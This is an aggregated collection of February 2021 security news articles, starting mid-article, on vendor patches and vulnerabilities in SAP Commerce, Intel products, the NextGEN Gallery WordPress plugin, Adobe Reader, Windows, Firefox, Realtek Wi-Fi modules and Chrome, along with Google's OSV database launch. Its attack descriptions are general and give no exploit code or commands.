Meant to define and execute rules to manage decision-making scenarios, the rule engine uses a ruleContent attribute offering scripting facilities. While making modifications to ruleContent should normally be allowed for highly privileged users only, a misconfiguration shipped with SAP Commerce resulted in lower-privileged users and user groups being allowed to change ruleContents.
“This enables unauthorized users to inject malicious code into these scripts resulting in a strong negative impact on the application’s confidentiality, integrity and availability,” researchers with Onapsis, a firm that specializes in securing Oracle and SAP applications, explain.
SAP has addressed the bug by changing the default permissions for new SAP Commerce installations, but additional manual remediation steps are needed for existing installations. These steps, Onapsis says, can be used as a full workaround, provided that the latest patches can’t be installed.
Two other Hot News notes that SAP included in this month’s Security Patch Day are updates to previously released notes: one deals with the Chromium browser in Business Client, and the other with vulnerabilities initially addressed in Business Warehouse in January 2021.
Next in line are two other updated security notes, one for missing authorization checks in NetWeaver AS ABAP and S4 HANA (released in December 2020), and another for a denial of service flaw in NetWeaver AS ABAP and ABAP Platform (released in January 2021). Both have a high severity rating.
The remaining security patches, either new or updated, address medium-severity vulnerabilities in NetWeaver Master Data Management 7.1, NetWeaver Process Integration, Business Objects Business Intelligence Platform, SAPUI5, Web Dynpro ABAP Applications, UI5 HTTP Handler, and HANA Database.
Intel Patches Tens of Vulnerabilities in Software, Hardware Products
11.2.2021
Vulnerebility
Securityweek
Intel on Tuesday announced the release of updates that patch tens of vulnerabilities across many of the company’s software and hardware products.
The chipmaker’s Patch Tuesday updates for February 2021 were described in 19 advisories, including four that cover high-severity vulnerabilities.
The list of high-severity flaws includes a privilege escalation issue in the Intel Solid State Drive (SSD) Toolbox, and a denial-of-service (DoS) flaw in the XMM 7360 Cell Modem that can be exploited by an unauthenticated attacker who has network access.
In its graphics drivers, Intel patched nearly two dozen vulnerabilities, including five high-severity bugs that can be exploited by authenticated attackers — four of them allow privilege escalation and one can be exploited for DoS attacks.
Intel also informed customers about five vulnerabilities in Server Board, Server System and Compute Modules Baseboard Management Controller (BMC) products, including two high-severity privilege escalation issues.
Medium-severity vulnerabilities have been patched in RealSense Depth Camera Manager (DCM), Ethernet I210 Controller series network adapters, Trace Analyzer and Collector, SOC Driver Package for STK1A32SC, Ethernet E810 adapter drivers for Linux and Windows, 722 Ethernet controllers, Software Guard Extensions (SGX), Extreme Tuning Utility (XTU), Quartus Prime software, PROSet/Wireless WiFi and Killer drivers for Windows 10, Enhance Privacy ID (EPID) SDK, Server Board Onboard Video driver for Windows, Collaboration Suite for WebRTC, and the Optane DC Persistent Memory installer for Windows.
These security holes can lead to privilege escalation, DoS attacks and information disclosure, but exploitation in many cases requires a privileged user and local access.
Software and firmware updates have been released by Intel to patch these vulnerabilities. Intel has replaced SSD Toolbox with the Memory and Storage (MAS) tool, so SSD Toolbox will not be updated to patch the high-severity privilege escalation flaw.
Many of the vulnerabilities disclosed this week were discovered by Intel employees.
Microsoft’s Patch Tuesday updates for February 2021 fix over 50 vulnerabilities, including an actively exploited Windows kernel flaw. Adobe has also addressed more than 50 security holes, including a Reader vulnerability that has been exploited in limited attacks against Windows users.
Vulnerabilities in NextGEN Gallery Plugin Exposed Many WordPress Sites to
Takeover
11.2.2021
Vulnerebility
Securityweek
Two severe vulnerabilities in the NextGEN Gallery WordPress plugin could have exposed more than 800,000 websites to complete takeover, WordPress security company Defiant reported on Monday.
Available for more than a decade, the plugin provides users with a broad range of gallery management capabilities, such as batch upload of photos, metadata import, thumbnail editing, photo and gallery management, and more.
In December 2020, security researchers with Defiant’s Wordfence team discovered two cross-site request forgery (CSRF) vulnerabilities in the popular plugin, the most severe of which could lead to remote code execution (RCE) and stored cross-site scripting (XSS).
“Exploitation of these vulnerabilities could lead to a site takeover, malicious redirects, spam injection, phishing, and much more,” the security researchers say.
Tracked as CVE-2020-35942, the first of these issues features a CVSS score of 9.6 and affects one of the plugin’s security functions, is_authorized_request.
Because NextGEN Gallery supports the upload of custom CSS files, the vulnerability allows for the upload of arbitrary code with double extensions, such as .php.css, and have code in them executed on certain configurations, remotely. Code execution was also possible on configurations not vulnerable to double extensions, because of a “Legacy Templates” feature.
An attacker able to execute code remotely on a vulnerable website would be able to essentially take over the site. A similar result can be achieved via XSS, if a logged-in administrator visits a malicious page (which would likely require social engineering tactics).
Tracked as CVE-2020-35943, the second vulnerability is considered high severity (CVSS score of 8.8) and resides in the validate_ajax_request security function that was implemented for various AJAX actions. A logic flaw in the function would result in requests being processed if a specific parameter was missing.
“This made it possible to trick an administrator into submitting a request crafted to upload an arbitrary image file. While the uploaded file had to be a valid image file, it is possible to hide a webshell or other executable PHP code within such an image file,” Wordfence explains.
By setting the image file as Legacy Template, an attacker could combine the flaw with the previously described vulnerability and abuse it for code execution. However, the attacker would have to convince an administrator to click on a link resulting in these requests being sent.
Wordfence reported these vulnerabilities to the plugin’s publisher, Imagely, on December 14, 2020, and a patched version of the plugin was published three days later. Site admins should make sure they are running NextGEN Gallery version 3.5.0 or later, to be protected.
Adobe fixes a buffer overflow issue in Reader which is exploited in the wild
10.2.2021
Vulnerebility
Securityaffairs
Adobe released security patches for 50 flaws affecting six products, including a
zero-day flaw in Reader that has been exploited in the wild.
Adobe has
released security updates that address 50 vulnerabilities affecting its Adobe
Acrobat, Magento, Photoshop, Animate, Illustrator, and Dreamweaver products.
Adobe fixed 23 CVEs in Adobe Reader, 17 of which have been rated as Critical.
One of these flaws, tracked as CVE-2021-21017, is a heap-based buffer overflow
issue that affects the Adobe Reader. The flaw is known to be actively exploited
in the wild to achieve remote code execution on the vulnerable computer.
The
flaw was anonymously reported to Adobe, the IT giant was informed that the
vulnerability has been “exploited in the wild in limited attacks targeting
Reader users on Windows.”
Adobe also addressed 18 vulnerabilities in Magento,
seven of which have been rated as Critical.
Only three of these issues can be exploited by unauthenticated attackers without admin privileges. The flaws include reflected and stored XSS bugs, and an IDOR issue that can allow an attacker to access restricted resources.
Successful exploitation of some of the above issues could potentially lead to arbitrary code execution at the level of the current process.
The software vendor also fixed two Out-Of-Bounds (OOB) write vulnerabilities in the Illustrator product that could lead to code execution. The IT giant patched an Out-Of-Bounds (OOB) write vulnerability in the patch for Animate and an Important info disclosure issue in Dreamweaver. The company also fixed five critical flaws in Photoshop that could allow code execution.
“Besides the previously mentioned CVE-2021-21017, none of the other bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release.” reported ZDI. “A total of 14 of these bugs came through the ZDI program.”
Critical flaws in NextGen Gallery WordPress plugin still impact over 500K
installs
10.2.2021
Vulnerebility
Securityaffairs
The development team behind the NextGen Gallery plugin has addressed two severe
CSRF vulnerabilities that could have allowed site takeover.
The developers
behind the NextGen Gallery plugin have fixed two critical Cross-site request
forgery (CSRF) vulnerabilities, their exploitation could lead to a site
takeover, malicious redirects, spam injection, phishing, and other malicious
activities.
The NextGEN Gallery is one of the most popular WordPress gallery plugins that is
available since 2007. The plugin receives over 1.5 million new downloads per
year, it easily allows to create highly responsive photo galleries
The
NextGen Gallery currently has over 800,000 active installs, which means that a
flaw in this plugin could have a widespread impact.
The two CSRF vulnerabilities, tracked as CVE-2020-35942, were discovered by researchers at security firm Wordfence.
Both issues would result in Reflected Cross-Site Scripting (XSS) and remote code
execution (RCE) because an uploaded file would be included and executed whenever
the selected album type was viewed on the site.
“Thus, it was possible to set
various album types to use a template with the absolute path of the file
uploaded in the previous step, or perform a directory traversal attack using the
relative path of the uploaded file, regardless of that file’s extension, through
a CSRF attack.” reads the post published by Wordfence.
“This would result in Local File Inclusion (LFI) and Remote code Execution (RCE), as the uploaded file would then be included and executed whenever the selected album type was viewed on the site. Any JavaScript included in the uploaded file would also be executed, resulting in Cross-Site Scripting (XSS).”
The experts pointed out that upon achieving Remote Code Execution on a website, attackers could have taken over the sites running the vulnerable versions of the plugin.
An attacker could trigger the flaws with social engineering techniques by
tricking WordPress admins into clicking specially crafted links or attachments
to perform malicious actions.
“As a reminder, once an attacker achieves
Remote Code Execution on a website, they have effectively taken over that site.
XSS can likewise be used to take over a site if a logged-in administrator visits
a page running a malicious injected script.” reads the post published by
Wordfence.
“This attack would likely require some degree of social engineering, as an attacker would have to trick an administrator into clicking a link that submitted crafted requests to perform these actions.”
Below the vulnerability timeline:
December 14, 2020 – The Wordfence Threat Intelligence team finishes researching
vulnerabilities in NextGen Gallery. We deploy firewall rules and reach out to
Imagely.
December 15, 2020 – Imagely replies and we provide full disclosure.
December 16, 2020 – Imagely sends us a patched version of the plugin to review.
December 17, 2020 – A patched version of NextGen Gallery is made available to
the public.
January 13, 2021 – Sites running the free version of Wordfence
receive firewall rules.
Since the release of the latest version, NextGEN Gallery only has over 260K new downloads, which implies that over 500K active installs are still vulnerable.
Patch Tuesday: Microsoft Warns of Under-Attack Windows Kernel Flaw
10.2.2021
Vulnerebility
Securityweek
Microsoft's scheduled monthly batch of security patches landed with a loud thud Tuesday with fixes for at least 56 security vulnerabilities in a range of operating system and software products.
At least one of the flaws (CVE-2021-1732) is being exploited in the wild in zero-day attacks. Microsoft did not provide any additional details on the in-the-wild attacks beyond a generic "exploitation detected" checkbox in the advisory.
The acknowledgement of this zero-day attack, reported to Microsoft by Chinese security vendor DBAPPSecurity Ltd., comes just days after reports of a separate -- and still unpatched -- Internet Explorer vulnerability being used by hackers linked to the North Korean government.
[ ALSO READ: Adobe Confirms PDF Reader Flaw Being Exploited ]
The zero-day patch headlines a mega-patch release by Microsoft with fixes for 56 documented CVEs in multiple Windows OS frameworks and components, the widely deployed Office Product line and the Skype for Business and Windows Defender utilities.
Microsoft rates 11 of the 56 vulnerabilities as "critical," its highest severity rating. A total of 43 patched flaws are classified as "important" while two are rated "moderated."
The Microsoft patch drop adds to the workloads for weary defenders struggling to keep pace with the volume and pace of security updates from major vendors.
Earlier Tuesday, Adobe shipped fixes for multiple dangerous security holes, including a bug in the Adobe Reader that is being exploited in "limited targeted attacks" against Windows OS users.
A few days ago, Sonicwall warned of zero-day attacks against some products in its portfolio while Apple and Google scrambled to provide band-aids for under-attack flaws in the iOS and Android operating systems.
To make matters worse, the communications and guidance from these big-name vendors have been poor. Adobe, for example, casually mentioned the in-the-wild PDF Reader attacks but did not provide any IOCs (indicators of compromise) or other attack artifacts to aid enterprise threat hunters.
Microsoft, too, has been scarce with information on flaws that are being actively exploited or publicly known. It is likely the information has been shared with the company's MAPP (Microsoft Active Protection Program) partners of security vendors but several CISOs tell SecurityWeek it's becoming more and more difficult to mount a response plan without proper technical documentation of live attacks.
In addition to the bug under active exploitation (no IOCs available), Microsoft mentioned that six separate vulnerabilities are publicly known and exploit code may be available but the company did not provide additional documentation.
For a round-up of the major vulnerabilities and issues to prioritize, we recommend this recap from ZDI (Zero Day Initiative). Some highlights:
CVE-2021-1732 - Windows Win32k Elevation of Privilege Vulnerability
This local privilege escalation would allow a logged-on user to execute code of their choosing at higher privileges. Bugs of this nature are typically paired with another bug that allows code execution a the logged-on user level. For example, this could be paired with an Adobe Reader exploit. An attacker would entice a user to open a specially crafted PDF, which would result in code execution through the Reader bug then escalation through this bug. This is also a common tactic for malware.
CVE-2021-24078 - Windows DNS Server Remote Code Execution Vulnerability
This patch fixes a bug in the Windows DNS Server that could allow remote code execution on affected systems. Fortunately, if your system is not configured to be a DNS server, it is not impacted by this bug. However, for those systems that are configured as DNS servers, this bug allows code execution in a privileged service from a remote, unauthenticated attacker. This is potentially wormable, although only between DNS servers. Prioritize this update if you depend on Microsoft DNS servers.
CVE-2021-24074 - Windows TCP/IP Remote Code Execution Vulnerability
There are two TCP/IP bugs in this month’s release, but I chose to highlight this vulnerability over CVE-2021-24094 since this bug affects IPv4 while the other impacts IPv6. Both bugs could allow remote, unauthenticated code execution on affected systems. For CVE-2021-24074, the vulnerability resides in IPv4 source routing, which should be disabled by default. You can also block source routing at firewalls or other perimeter devices. The IPv6 bug involves packet fragmentation where a large number of fragments could lead to code execution.
CVE-2021-26701 - .NET Core and Visual Studio Remote Code Execution Vulnerability
This is the only Critical-rated bug to be listed as publicly known, and without more information from Microsoft, that’s about all we know about it. Based on the CVSS, this could all remote, unauthenticated attackers to execute arbitrary code on an affected system. Regardless, if you rely on the .NET Framework or .NET Core, make sure you test and deploy this one quickly.
Adobe Patches Reader Vulnerability Exploited in the Wild
10.2.2021
Vulnerebility
Securityweek
Adobe on Tuesday announced the availability of patches for 50 vulnerabilities across six of its products, including a zero-day vulnerability in Reader that has been exploited in the wild.
The exploited vulnerability is tracked as CVE-2021-21017 and it was reported to Adobe anonymously. The software giant said it received a report that the flaw has been “exploited in the wild in limited attacks targeting Adobe Reader users on Windows.”
Little information has been shared about the zero-day vulnerability, but Adobe says it’s a heap-based buffer overflow that allows arbitrary code execution.
The last time Adobe patched an actively exploited zero-day vulnerability in Reader was in 2018.
An additional 22 vulnerabilities have been patched in Acrobat and Reader, including 16 critical issues that can be exploited for code execution. The remaining flaws can lead to privilege escalation and information disclosure.
Updates for the Magento e-commerce platform fix 18 vulnerabilities, but only three of them can be exploited without authentication and without admin privileges, including reflected and stored XSS bugs, and an IDOR issue that can allow an attacker to access restricted resources. However, only the stored XSS has been classified as critical.
In Photoshop, Adobe patched five critical memory corruption issues that can lead to arbitrary code execution, and in Animate the company resolved one such vulnerability. Two critical code execution flaws were patched in Illustrator.
In Dreamweaver, the company fixed one information disclosure issue.
Adobe says it’s not aware of any attacks exploiting the vulnerabilities in Magento, Photoshop, Animate, Illustrator and Dreamweaver, and, based on the assigned priority ratings, it does not expect them to be targeted.
Critical Firefox Vulnerability Can Allow Code Execution If Chained With Other
Bugs
10.2.2021
Vulnerebility
Securityweek
An update released last week by Mozilla for Firefox 85 patches a critical information disclosure vulnerability that can be chained with other security flaws to achieve arbitrary code execution.
In its advisory for the vulnerability — the bug currently does not have a CVE identifier — Mozilla described it as a “buffer overflow in depth pitch calculations for compressed textures.” The issue, reported by researchers Abraruddin Khan and Omair through Trend Micro’s Zero Day Initiative (ZDI), apparently only impacts Firefox running on Windows — other operating systems are not affected.
“In the Angle graphics library, depth pitch computations did not take into account the block size and simply multiplied the row pitch with the pixel height. This caused the load functions to use a very high depth pitch, reading past the end of the user-supplied buffer,” Mozilla said.
ZDI vulnerability researcher Hossein Lotfi told SecurityWeek that the vulnerability is an information disclosure bug that exists within the implementation of the compressedTexImage3D API method in WebGL2. Exploitation requires the attacker to convince the targeted user to visit a malicious web page or open a malicious file.
“The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer,” Lotfi explained. “An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.”
ZDI is not aware of any attacks exploiting this vulnerability and there does not appear to be public knowledge of the flaw. The company will release an advisory of its own once a CVE identifier has been assigned.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has advised users and administrators to review Mozilla’s advisory and take action as necessary. A patch is included in Firefox 85.0.1 and Firefox ESR 78.7.1.
Critical WordPress Plugin Flaw Allows Site Takeover
9.2.2021 Vulnerebility Threatpost
A patch in the NextGen Gallery WordPress plugin fixes critical and high-severity cross-site request forgery flaws.
Researchers are urging WordPress websites that utilize the NextGen Gallery plugin to apply a patch addressing critical and high-severity flaws.
The NextGen Gallery plugin, which is installed on 800,000 WordPress websites, allows sites to upload photos in batch quantities, import metadata and edit image thumbnails. Researchers discovered two cross-site request forgery (CSRF) flaws – one critical and one high-severity – in the plugin.
A patch was released for flaws in version 3.5.0, on Dec. 17. In the first public disclosure of details of the flaw, released Monday, researchers urged website owners who use the plugin to ensure they are updated.
“Exploitation of these vulnerabilities could lead to a site takeover, malicious redirects, spam injection, phishing and much more,” said Ram Gall with Wordfence, on Monday.
What is a Cross-Site Request Forgery Flaw?
CSRF is a type of web flaw that
allows an attacker to trick web browsers into performing malicious, unauthorized
commands. Typically, CSRF attacks are carried out by attackers with a link sent
to the victim – and using social engineering to persuade them to click on it.
When victims click on the link, they are inadvertently sending a forged request
to a server – resulting in the attacker being able to perform various commands.
Critical NextGen Gallery Security Flaw
The more serious of the two flaws is a
critical-severity vulnerability (CVE-2020-35942). The flaw stems from NextGen
Gallery’s security function (is_authorized_request) that is used to protect its
various settings. This feature integrates both a capability check and a nonce
check into a single function for easier application throughout the plugin.
“Unfortunately, a logic flaw in the is_authorized_request function meant that the nonce check would allow requests to proceed if the $_REQUEST[‘nonce’] parameter was missing, rather than invalid,” said researchers.
This could have allowed bad actors to carry out various attacks. To exploit this flaw, an attacker would have to trick an administrator into clicking a link. This would then submit crafted requests to perform various malicious actions, said researchers.
A successful attack “would require two separate requests, though this would be trivial to implement and we were able to do so during our testing,” researchers said. And, “the site would require at least one album to be published and accessible to the attacker.”
If an attacker successfully persuaded an admin to click on a link, the subsequent uploaded file would then be included and executed whenever the latter selected album type was viewed on the site. Any JavaScript included in the uploaded file would then also be executed, said researchers.
“As a reminder, once an attacker achieves remote code execution on a website, they have effectively taken over that site,” said researchers. “XSS can likewise be used to take over a site if a logged-in administrator visits a page running a malicious injected script.”
High-Severity File-Upload Security Flaw
A second, similar logic flaw
(CVE-2020-35943) stemmed from a separate security function,
validate_ajax_request, used for various AJAX actions including those used to
upload images.
“This function had a similar logic flaw that would allow requests to proceed if the $_REQUEST[‘nonce’] parameter was missing, rather than invalid,” said researchers.
Attackers could trick an administrator into submitting a request crafted to upload an arbitrary image file. While the uploaded file had to be a valid image file, it is possible to hide a webshell or other malicious, executable PHP code within such an image file, they said.
“This could also be combined with the previous vulnerability, and the image file could be set as a ‘Legacy Template,’ at which point it would be included and the code within would be executed,” said researchers. “Again, this would require some degree of social engineering, as an attacker would have to trick an administrator into clicking a link that resulted in these requests being sent.”
Update to NextGen Gallery Version 3.5.0
The developer of NextGen Gallery,
Imagely, has issued patches for these flaws in version 3.5.0. According to the
NextGen Gallery plugin page, only 26.2 percent of users are utilizing version
3.5. Threatpost has reached out to Imagely for further comment.
The number of installs for each version of NextGen Gallery. Credit: Imagely
“If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected as these are critical and high severity vulnerabilities that can lead to full site takeover,” said researchers.
The flaw is only the latest to plague a WordPress plugin. Last week, a security bug in Contact Form 7 Style, a WordPress plugin installed on over 50,000 sites, was reported that could allow for malicious JavaScript injection on a victim website. And in January, two flaws (one critical) in a WordPress plugin called Orbit Fox were found that could allow attackers to inject malicious code into vulnerable websites, or take control of a website.
Google launches Open Source Vulnerabilities (OSV) database
9.2.2021
Vulnerebility
Securityaffairs
Google announced the launch of OSV (Open Source Vulnerabilities), a
vulnerability database and triage infrastructure for open source projects.
Google last week announced the OSV (Open Source Vulnerabilities), a
vulnerability database and triage infrastructure for open source projects.
The database aims at helping both open source maintainers and consumers of open source projects.
The archive could allow users and maintainers of open-source software to find the vulnerabilities that affect them, providing detailed info about versions and commits impacted by the issues. Maintainers of open source software could benefit of OSV’s automation to reduce the burden of triage.
“We are excited to launch OSV (Open Source Vulnerabilities), our first step towards improving vulnerability triage for developers and consumers of open source software.” reads the post published by Google. “The goal of OSV is to provide precise data on where a vulnerability was introduced and where it got fixed, thereby helping consumers of open source software accurately identify if they are impacted and then make security fixes as quickly as possible.”
At the time of the launch, the database only includes vulnerabilities from
OSS-Fuzz (mostly C/C++), but Google plans to add more data sources soon (e.g.
npm Registry and PyPI).
OSV already includes information on thousands of
vulnerabilities from more than 380 critical open source projects integrated with
Google’s OSS-Fuzz fuzzing service.
“OSV is a vulnerability database for open source projects. It exposes an API that lets users of these projects query whether or not their versions are impacted.” reads the description of the project.
“For each vulnerability, we perform bisects to figure out the exact commit that introduces the bug, as well the exact commit that fixes it. This is cross referenced against upstream repositories to figure out the affected tags and commit ranges.”
The OSV database exposes a simple API to query for vulnerabilities, maintainers and users could provide a git commit hash or a version number to receive the list of vulnerabilities that are present for that version.
“Similarly, it is time consuming for maintainers to determine an accurate list of affected versions or commits across all their branches for downstream consumers after a vulnerability is fixed, in addition to the process required for publication.” continues Google. “Unfortunately, many open source projects, including ones that are critical to modern infrastructure, are under resourced and overworked. Maintainers don’t always have the bandwidth to create and publish thorough, accurate information about their vulnerabilities even if they want to.”
OSV
The OSV aims at rethinking and promoting better, scalable vulnerability
tracking for open source.
“In an ideal world, vulnerability management should be done closer to the actual open source development process, aided by automated infrastructure. Projects that depend on open source should be promptly notified and fixes uptaken quickly when a vulnerability is reported,” Google closes.
Users can access the OSV website and documentation at https://osv.dev and explore the open source repo or contribute to the project on GitHub. Google also set up a mailing list to stay up to date with OSV and share your thoughts on vulnerability tracking.
Google Launches Database for Open Source Vulnerabilities
9.2.2021
Vulnerebility
Securityweek
Google last week announced the launch of OSV (Open Source Vulnerabilities), which the internet giant has described as a vulnerability database and triage infrastructure for open source projects.
OSV should make it easier for the users of open source software to find out which vulnerabilities impact them. It can also help maintainers of open source software accurately identify all versions and commits impacted by a flaw across all their branches.
Google OSVFor consumers, Google says OSV provides a database that can be easily queried, with its goal being to complement existing vulnerability databases.
“OSV automates the triage workflow for an open source package consumer by providing an API to query for vulnerabilities,” Google’s security team said in a blog post.
In the case of maintainers, they can obtain information on the impact of vulnerabilities by providing the commit that introduced a bug and the commit that patched it.
“Unfortunately, many open source projects, including ones that are critical to modern infrastructure, are under resourced and overworked. Maintainers don't always have the bandwidth to create and publish thorough, accurate information about their vulnerabilities even if they want to,” Google’s security experts said.
OSV currently stores information on thousands of vulnerabilities from more than 380 critical open source projects integrated with Google’s OSS-Fuzz fuzzing service. However, the company wants to extend it with data from repositories such as npm Registry and PyPI. It also wants to make it very easy for developers to submit information on vulnerabilities.
“Our goal with OSV is to rethink and promote better, scalable vulnerability tracking for open source. In an ideal world, vulnerability management should be done closer to the actual open source development process, aided by automated infrastructure. Projects that depend on open source should be promptly notified and fixes uptaken quickly when a vulnerability is reported,” Google said.
Experts found critical flaws in Realtek Wi-Fi Module
7.2.2021
Vulnerebility
Thehackernews
Critical flaws in the Realtek RTL8195A Wi-Fi module could have been exploited to
gain root access and take over devices’ wireless communications.
Researchers
from Israeli IoT security firm Vdoo found six vulnerabilities in the Realtek
RTL8195A Wi-Fi module that could have been exploited to gain root access and
take control of a device’s wireless communications.
The Realtek RTL8195AM is a highly integrated single-chip with a low-power-consumption mechanism ideal for IoT (Internet of Things) applications in multiple industries.
The module implements an “Ameba” API to allow developers to communicate with the device via Wi-Fi, HTTP, and MQTT, which is a lightweight messaging protocol for small sensors and mobile devices.
Realtek supplies their own “Ameba” API to be used with the device, which allows any developer to communicate easily via Wi-Fi, HTTP, mDNS, MQTT and more.
“As part of the module’s Wi-Fi functionality, the module supports the WEP, WPA and WPA2 authentication modes.” reads the analysis published by the experts.
“In our security assessment, we have discovered that the WPA2 handshake mechanism is vulnerable to various stack overflow and read out-of-bounds issues.”
The flaws discovered by the experts Experts discovered are stack overflow and out-of-bounds issues that are related to the Wi-Fi module’s WPA2 four-way handshake mechanism during authentication.
The vulnerabilities discovered by Vdoo also impact other modules, including
RTL8711AM, RTL8711AF, and RTL8710AF.
The most severe issue we discovered is
VD-1406, a remote stack overflow that allows an attacker in the proximity of an
RTL8195 module to completely take over the module, without knowing the Wi-Fi
network password (PSK) and regardless of whether the module is acting as a Wi-Fi
access point or client. The attack scenarios are detailed in the next section:
“Technical Deep-Dive”.
The most severe vulnerability, tracked as
CVE-2020-9395, is a remote stack overflow that could be exploited by attackers
in the proximity of a vulnerable RTL8195 module to completely take over it. The
experts pointed out that the attackers don’t need the knowledge of the Wi-Fi
network password (PSK) or whether the module is acting as a Wi-Fi access point
or client.
The experts discovered to denial of service flaws and three flaws that could allow an attacker the exploitation of Wi-Fi client devices and the execution of arbitrary code.
Below the full list of flaws discovered by the expers:
VD-1406 (CVE-2020-9395) – Stack-based buffer overflow vulnerability
VD-1407
(CVE-2020-25853) – Read out of bounds vulnerability
VD-1408 (CVE-2020-25854)
– Stack-based buffer overflow vulnerability;
VD-1409 (CVE-2020-25855) –
Stack-based buffer overflow vulnerability
VD-1410 (CVE-2020-25856) –
Stack-based buffer overflow vulnerability
VD-1411 (CVE-2020-25857) –
Stack-based buffer overflow vulnerability
In order to address the flaws,
users have to download the updated versions of the Ameba SDK from Realtek’s
website. The latest version of Ameba Arduino (2.0.8) contains patches for all
the above issues.
Unpatched WordPress Plugin Code-Injection Bug Afflicts 50K Sites
6.2.2021 Vulnerebility Threatpost
contact form 7 style wordpress plugin bug
An CRSF-to-stored-XSS security bug
plagues 50,000 ‘Contact Form 7’ Style users.
A security bug in Contact Form 7 Style, a WordPress plugin installed on over 50,000 sites, could allow for malicious JavaScript injection on a victim website.
The latest WordPress plugin security vulnerability is a cross-site request forgery (CSRF) to stored cross-site scripting (XSS) problem in Contact Form 7 Style, which is an add-on to the well-known Contact Form 7 umbrella plugin. It ranks 8.8 out of 10 on the CVSS vulnerability-severity scale (CVE is pending).
CSRF allows an attacker to induce a victim user to perform actions that they do not intend to. XSS allows an attacker to execute arbitrary JavaScript within the browser of a victim user. This bug connects the two approaches.
Researchers at Wordfence said that there’s no patch yet available, and versions 3.1.9 and below are affected. WordPress removed the plugin from the WordPress plugin repository on Feb. 1.
Vulnerable Contact Form 7 Style
Contact Form 7 is used to create, as its name
suggests, contact forms used by websites. The vulnerable Contact Form 7 Style is
an add-on that can be used to add additional bells and whistles to those forms
that are made with Contact Form 7.
It does this by allowing users to customize a site’s Cascading Style Sheets (CSS) code, which is used to dictate the appearance of WordPress-based websites. This is where the vulnerability lies, according to Wordfence researchers.
“Due to the lack of sanitization and lack of nonce protection on this feature, an attacker could craft a request to inject malicious JavaScript on a site using the plugin,” they explained, in a posting this week, adding that further details will be withheld to give site owners a chance to address the issue. “If an attacker successfully tricked a site’s administrator into clicking a link or attachment, then the request could be sent and the CSS settings would be successfully updated to include malicious JavaScript.”
Since the number of installed instances for the plugin is so high, Due to the number of sites affected by this plugin’s closure, we are intentionally providing minimal details about this vulnerability to provide users ample time to find an alternative solution. We may provide additional details later as we continue to monitor the situation.
To exploit the flaw, cyberattackers would need to convince a logged-in administrator to click on a malicious link, which can be done via any of the common social-engineering approaches (i.e., through a fraudulent email or instant message).
Wordfence notified the plugin’s developer about the bug in early December; after receiving no response, the researchers then escalated the issue to the WordPress Plugins team in early January. The WordPress Plugins team also contacted the developer with no response, leading to the disclosure this week.
How to Protect Against Malicious JavaScript Injection
Because, as with all
CSRF vulnerabilities, the bug can only be exploited if an admin user performs an
action while authenticated to the vulnerable WordPress site, admins should
always be wary when clicking on any links.
“If you feel you must click a link, we recommend using incognito windows when you are unsure about a link or attachment,” according to Wordfence. “This precaution can protect your site from being successfully exploited by this vulnerability along with all other CSRF vulnerabilities.”
In this case, users should also deactivate and remove the Contact Form 7 Style plugin and find a replacement, researchers added, since no patch appears to be forthcoming.
Google Chrome Zero-Day Afflicts Windows, Mac Users
6.2.2021 Vulnerebility Threatpost
Google warns of a zero-day vulnerability in the V8 open-source engine that’s being actively exploited by attackers.
Google is warning of a zero-day vulnerability in its V8 open-source web engine that’s being actively exploited by attackers.
A patch has been issued in version 88 of Google’s Chrome browser — specifically, version 88.0.4324.150 for Windows, Mac and Linux. This update will roll out over the coming days and weeks, said Google. The flaw (CVE-2021-21148) stems from a heap-buffer overflow, said Google.
“Google is aware of reports that an exploit for CVE-2021-21148 exists in the wild,” according to Google’s Thursday security update.
What is a Heap-Buffer Overflow Security Flaw?
A heap-buffer overflow flaw as
its name suggests, is a type of buffer-overflow error. This is a class of
vulnerability where the region of a process’ memory used to store dynamic
variables (the heap) can be overwhelmed. If a buffer-overflow occurs, it
typically causes the affected program to behave incorrectly, according to
researchers with Imperva – causing memory access errors and crashes — and
opening the door to remote code execution.
However, beyond classifying the flaw as a heap-buffer overflow, Google did not specify the potential impact of this vulnerability. In fact, details of the bug overall (including how it can be exploited) remain scant while Google works to push out the fixes.
“Access to bug details and links may be kept restricted until a majority of users are updated with a fix,” said Google. “We will also retain restrictions if the bug exists in a third-party library that other projects similarly depend on, but haven’t yet fixed.”
What is the V8 JavaScript Engine?
The heap-buffer overflow error exists in
V8, an open-source WebAssembly and JavaScript engine developed by the Chromium
Project for Google Chrome and Chromium web browsers. V8, which is written in
C++, can run stand-alone, or can be embedded into any C++ application.
Bugs have previously been discovered (and exploited) in V8, including a flaw in November that was high-severity and tied to active exploits. That flaw was only described as an “inappropriate implementation in V8.”
Security Researchers: Targets for Chrome Zero-Day Exploits?
While Google
didn’t provide further details of the attackers exploiting the flaw, researchers
with Malwarebytes on Friday made a “general assumption” that the attack “was
used against security researchers working on vulnerability research and
development at different companies and organizations.”
They pointed to the timing of when the vulnerability was reported to Google by Mattias Buelens (Jan. 24) and when a report released by Google’s Threat Analysis Group (Jan. 26). That report by Google researchers revealed that hackers linked to North Korea were targeting security researchers with an elaborate social-engineering campaign that set up trusted relationships with them — and then infected their organizations’ systems with custom backdoor malware.
“One of the methods the attackers used was to interact with the researchers and get them to follow a link on Twitter to a write-up hosted on a malicious website,” said researchers with Malwarebytes. “Shortly after the visit, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin to communicate with a command and control (C&C) server. This sure sounds like something that could be accomplished using a heap buffer overflow in a browser.”
However, Google has not confirmed any correlation with this attack.
Google Chrome Browser: How to Update
Researchers urge Google Chrome users to
update as soon as possible. Chrome will in many cases update to its newest
version automatically, however security experts suggest that users double check
that this has happened. To check if an update is available:
Google Chrome users can go to chrome://settings/help by clicking Settings >
About Chrome
If an update is available Chrome will notify users and then
start the download process
Users can then relaunch the browser to complete
the update
Google Chrome Cybersecurity Flaws Continue
The flaw is only the
latest security issue in Google Chrome in recent months. In January, the
Cybersecurity and Infrastructure Security Agency (CISA) urged Windows, macOS and
Linux users of Google’s Chrome browser to patch an out-of-bounds write bug
(CVE-2020-15995) impacting the current 87.0.4280.141 version of the software.
And in December, Google updated Chrome to fix four bugs with a severity rating of “high” and eight overall. Three were use-after-free flaws, which could allow an adversary to generate an error in the browser’s memory, opening the door to a browser hack and host computer compromise.
